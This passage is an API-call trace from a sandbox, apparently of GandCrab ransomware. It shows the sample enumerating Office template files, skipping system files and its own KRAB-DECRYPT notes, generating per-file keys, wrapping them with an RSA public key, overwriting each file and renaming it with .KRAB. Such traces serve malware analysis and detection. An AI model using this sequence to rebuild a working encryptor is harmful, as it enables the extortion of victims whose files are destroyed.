lstrlenW (lpString=".xltx") returned 5 [0074.186] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.187] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".xltx ") returned 6 [0074.187] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.187] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx") returned 105 [0074.187] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx") returned 105 [0074.187] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="desktop.ini") returned 1 [0074.187] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="autorun.inf") returned 1 [0074.187] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="ntuser.dat") returned 1 [0074.187] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="iconcache.db") returned 1 [0074.187] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="bootsect.bak") returned 1 [0074.187] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="boot.ini") returned 1 [0074.187] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="ntuser.dat.log") returned 1 [0074.187] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="thumbs.db") returned -1 [0074.187] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="KRAB-DECRYPT.html") returned 1 [0074.187] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="KRAB-DECRYPT.txt") returned 1 [0074.187] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="CRAB-DECRYPT.txt") returned 1 [0074.187] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="ntldr") returned 1 [0074.188] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="NTDETECT.COM") returned 1 [0074.188] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="Bootfont.bin") returned 1 [0074.188] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.188] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1012558) returned 1 [0074.191] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0074.192] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0074.192] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0074.192] CryptGenRandom (in: hProv=0x1012558, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0074.192] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0074.192] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.192] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011ab8) returned 1 [0074.198] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0074.199] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0074.199] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0074.199] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0074.199] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0074.199] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.200] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1012558) returned 1 [0074.203] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023af8) returned 1 [0074.204] CryptGetKeyParam (in: hKey=0x1023af8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0074.204] CryptEncrypt (in: hKey=0x1023af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0074.204] GetLastError () returned 0x0 [0074.204] CryptDestroyKey (hKey=0x1023af8) returned 1 [0074.204] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0074.204] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011ab8) returned 1 [0074.210] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023b38) returned 1 [0074.210] CryptGetKeyParam (in: hKey=0x1023b38, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0074.210] CryptEncrypt (in: hKey=0x1023b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0074.210] GetLastError () returned 0x0 [0074.210] CryptDestroyKey (hKey=0x1023b38) returned 1 [0074.210] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0074.211] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\process map for cross-functional flowchart.xltx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0074.211] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0074.211] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0074.212] ReadFile (in: hFile=0x420, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x2355e, lpOverlapped=0x0) returned 1 [0074.717] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0xfffdcaa2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.717] WriteFile (in: hFile=0x420, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2355e, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x2355e, lpOverlapped=0x0) returned 1 [0074.718] WriteFile (in: hFile=0x420, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0074.718] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.722] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.723] CloseHandle (hObject=0x420) returned 1 [0074.725] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.726] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\process map for cross-functional flowchart.xltx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\process map for cross-functional flowchart.xltx.krab")) returned 1 [0074.726] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.727] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0074.727] lstrcmpW (lpString1="Stock symbols comparison.xltm", lpString2=".") returned 1 [0074.727] lstrcmpW (lpString1="Stock symbols comparison.xltm", lpString2="..") returned 1 [0074.727] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Stock symbols comparison.xltm" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm" [0074.727] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.727] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm.KRAB") returned 92 [0074.727] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm") returned 87 [0074.727] lstrlenW (lpString=".xltm") returned 5 [0074.727] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.728] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".xltm ") returned 6 [0074.728] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.728] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm") returned 87 [0074.728] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm") returned 87 [0074.728] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="desktop.ini") returned 1 [0074.728] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="autorun.inf") returned 1 [0074.728] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="ntuser.dat") returned 1 [0074.728] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="iconcache.db") returned 1 [0074.728] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="bootsect.bak") returned 1 [0074.728] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="boot.ini") returned 1 [0074.728] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="ntuser.dat.log") returned 1 [0074.728] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="thumbs.db") returned -1 [0074.728] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="KRAB-DECRYPT.html") returned 1 [0074.728] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="KRAB-DECRYPT.txt") returned 1 [0074.728] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="CRAB-DECRYPT.txt") returned 1 [0074.729] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="ntldr") returned 1 [0074.729] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="NTDETECT.COM") returned 1 [0074.729] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="Bootfont.bin") returned 1 [0074.729] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.729] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011ab8) returned 1 [0074.732] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0074.733] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0074.733] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0074.733] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0074.733] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0074.733] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.734] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1012558) returned 1 [0074.737] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0074.737] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0074.738] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0074.738] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0074.738] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0074.738] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.738] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1012558) returned 1 [0074.741] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023db8) returned 1 [0074.741] CryptGetKeyParam (in: hKey=0x1023db8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0074.741] CryptEncrypt (in: hKey=0x1023db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0074.742] GetLastError () returned 0x0 [0074.742] CryptDestroyKey (hKey=0x1023db8) returned 1 [0074.742] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0074.742] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1012558) returned 1 [0074.745] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023c78) returned 1 [0074.745] CryptGetKeyParam (in: hKey=0x1023c78, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0074.745] CryptEncrypt (in: hKey=0x1023c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0074.746] GetLastError () returned 0x0 [0074.746] CryptDestroyKey (hKey=0x1023c78) returned 1 [0074.746] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0074.746] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\stock symbols comparison.xltm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0074.746] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0074.746] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0074.879] ReadFile (in: hFile=0x420, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x100000, lpOverlapped=0x0) returned 1 [0075.018] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.018] WriteFile (in: hFile=0x420, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x100000, lpOverlapped=0x0) returned 1 [0075.020] ReadFile (in: hFile=0x420, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x6438a, lpOverlapped=0x0) returned 1 [0075.063] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0xfff9bc76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.063] WriteFile (in: hFile=0x420, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x6438a, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x6438a, lpOverlapped=0x0) returned 1 [0075.063] WriteFile (in: hFile=0x420, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0075.064] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.068] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.072] CloseHandle (hObject=0x420) returned 1 [0075.107] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.810] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\stock symbols comparison.xltm"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\stock symbols comparison.xltm.krab")) returned 1 [0075.811] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.811] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0075.811] lstrcmpW (lpString1="Welcome to Excel.xltx", lpString2=".") returned 1 [0075.812] lstrcmpW (lpString1="Welcome to Excel.xltx", lpString2="..") returned 1 [0075.812] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Welcome to Excel.xltx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx" [0075.812] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0075.812] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx.KRAB") returned 84 [0075.812] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx") returned 79 [0075.812] lstrlenW (lpString=".xltx") returned 5 [0075.812] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0075.812] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".xltx ") returned 6 [0075.812] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.813] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx") returned 79 [0075.813] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx") returned 79 [0075.813] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="desktop.ini") returned 1 [0075.813] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="autorun.inf") returned 1 [0075.813] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="ntuser.dat") returned 1 [0075.813] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="iconcache.db") returned 1 [0075.813] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="bootsect.bak") returned 1 [0075.813] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="boot.ini") returned 1 [0075.813] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="ntuser.dat.log") returned 1 [0075.813] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="thumbs.db") returned 1 [0075.813] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="KRAB-DECRYPT.html") returned 1 [0075.813] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="KRAB-DECRYPT.txt") returned 1 [0075.813] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="CRAB-DECRYPT.txt") returned 1 [0075.813] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="ntldr") returned 1 [0075.813] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="NTDETECT.COM") returned 1 [0075.813] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="Bootfont.bin") returned 1 [0075.813] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0075.813] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010ac8) returned 1 [0075.817] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0075.830] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0075.830] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0075.830] CryptGenRandom (in: hProv=0x1010ac8, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0075.830] CryptReleaseContext (hProv=0x1010ac8, dwFlags=0x0) returned 1 [0075.830] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.830] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10112c0) returned 1 [0075.834] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0075.834] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0075.834] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0075.834] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0075.834] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0075.834] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.835] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011810) returned 1 [0075.838] CryptImportKey (in: hProv=0x1011810, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10238f8) returned 1 [0075.838] CryptGetKeyParam (in: hKey=0x10238f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0075.838] CryptEncrypt (in: hKey=0x10238f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0075.838] GetLastError () returned 0x0 [0075.838] CryptDestroyKey (hKey=0x10238f8) returned 1 [0075.838] CryptReleaseContext (hProv=0x1011810, dwFlags=0x0) returned 1 [0075.838] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010bd8) returned 1 [0075.842] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023b78) returned 1 [0075.842] CryptGetKeyParam (in: hKey=0x1023b78, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0075.842] CryptEncrypt (in: hKey=0x1023b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0075.842] GetLastError () returned 0x0 [0075.842] CryptDestroyKey (hKey=0x1023b78) returned 1 [0075.843] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0075.843] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\welcome to excel.xltx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0075.843] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0075.843] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0075.844] ReadFile (in: hFile=0x420, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x78c9b, lpOverlapped=0x0) returned 1 [0075.998] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0xfff87365, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.998] WriteFile (in: hFile=0x420, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x78c9b, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x78c9b, lpOverlapped=0x0) returned 1 [0075.999] WriteFile (in: hFile=0x420, 